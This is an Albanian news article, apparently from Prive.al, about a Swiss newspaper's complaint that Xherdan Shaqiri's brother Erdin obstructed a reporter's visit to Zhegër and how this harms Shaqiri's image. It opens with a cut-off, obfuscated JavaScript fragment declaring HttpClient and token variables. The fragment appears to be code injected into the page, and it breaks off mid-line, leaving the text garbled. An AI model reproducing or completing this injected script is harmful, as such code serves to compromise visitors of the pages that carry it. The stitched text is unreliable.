;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

SI PO E DËMTON SHAQIRI IMAZHIN E VET ?!

By

Brenda një periudhe të shkurtër, Xherdan Shaqiri u shndërrua në ikonë për shumë talentë që ëndërrojnë sukses në karrierën sportive.

Një djalosh që si foshnje emigron bashkë me familjen e tij në Zvicërr nga Zhegra e Gjilanit bëhet i pëlqyer nga të gjithë për talentin në fushën e blertë dhe jo vetëm.

Edhe megjithë kampanjat e panumërta publicitare, imazhi i Shaqirit rezistoi stoik si njeri i thjeshtë dhe miqësor me të gjithë.

Por duket se ky perceptim çdo herë e më shumë po përmbyset.Gazeta zvicerane në gjuhën gjermane “Aargauer Zeitung” përmes një artikulli të gjatë është shprehur me gjuhë të ashpër indinjate ndaj sjelljeve të vëllaut të Shaqirit, Erdinit i cili edhe është përgjegjës për komunikim me media.

E gjithë historia ka nisur kur gazetari nga ky medium ka shprehur interesim që të udhëtojë për në Kosovë për realizimin e një shkrimi për Shaqirin që nis tek rrënjët, vendlindja.

Kjo ide që në fillim has në refuzim të Erdinit i cili përveçse nuk i jep leje mediumit të shkojë në Zhegër synon të kontrollojë përpara publikimit secilën fjalë që do shkruhet.

Mikpritja e shqiptarit që proklamohet e përflitet botërisht, për François Schmid-Bechtel do të tingëllojë përherë si utopi, sepse kaloi mijëra kilometra nga shteti Helvetik për në shtetin më të ri në Europë për t’u përballur në fund me një përplasje dere nga kushëriri i Xherdanit në Zhegër.

Në shkrimin që transmetohet nga albinfo.ch, kapitulli i historisë përmbyllet me befasinë e autorit në lidhje me mungesën e investimeve të një milioneri në fshatin e tij, duke aluduar në Shaqirin.

Ky rrëfim aspak i këndëshëm dëshmon më së miri rëndësinë e imazhit publik, faktor të cilin Xherdani dhe familja e tij nuk duhet ta neglizhojnë asnjëherë. /Prive.al/

Artikuj të ngjashëm